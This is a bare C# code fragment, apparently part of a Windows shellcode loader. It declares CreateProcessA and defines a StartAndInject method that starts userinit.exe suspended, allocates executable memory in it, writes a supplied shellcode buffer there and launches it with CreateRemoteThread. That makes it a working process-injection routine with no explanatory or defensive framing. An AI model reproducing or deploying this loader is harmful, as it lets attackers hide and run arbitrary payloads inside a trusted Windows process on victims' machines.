public static extern IntPtr CreateProcessA(String lpApplicationName, String lpCommandLine, Structs.SecurityAttributes lpProcessAttributes, Structs.SecurityAttributes lpThreadAttributes, Boolean bInheritHandles, Structs.CreateProcessFlags dwCreationFlags, IntPtr lpEnvironment, String lpCurrentDirectory, [In] Structs.StartupInfo lpStartupInfo, out Structs.ProcessInformation lpProcessInformation );
public static void StartAndInject(byte[] shellcode) { string binary = "userinit.exe"; Int32 size = shellcode.Length; Structs.StartupInfo sInfo = new Structs.StartupInfo(); sInfo.dwFlags = 0; Structs.ProcessInformation pInfo; string binaryPath = "C:\\Windows\\System32\\" + binary; IntPtr funcAddr = WinAPI.CreateProcessA(binaryPath, null, null, null, true, Structs.CreateProcessFlags.CREATE_SUSPENDED, IntPtr.Zero, null, sInfo, out pInfo); IntPtr hProcess = pInfo.hProcess; IntPtr spaceAddr = WinAPI.VirtualAllocEx(hProcess, new IntPtr(0), (uint)size, MEM_COMMIT, PAGE_EXECUTE_READWRITE); UIntPtr bytesWritten; IntPtr size2 = new IntPtr(shellcode.Length); bool bWrite = WinAPI.WriteProcessMemory(hProcess, spaceAddr, shellcode, (uint)size2, out bytesWritten); WinAPI.CreateRemoteThread(hProcess, new IntPtr(0), new uint(), spaceAddr, new IntPtr(0), new uint(), new IntPtr(0)); }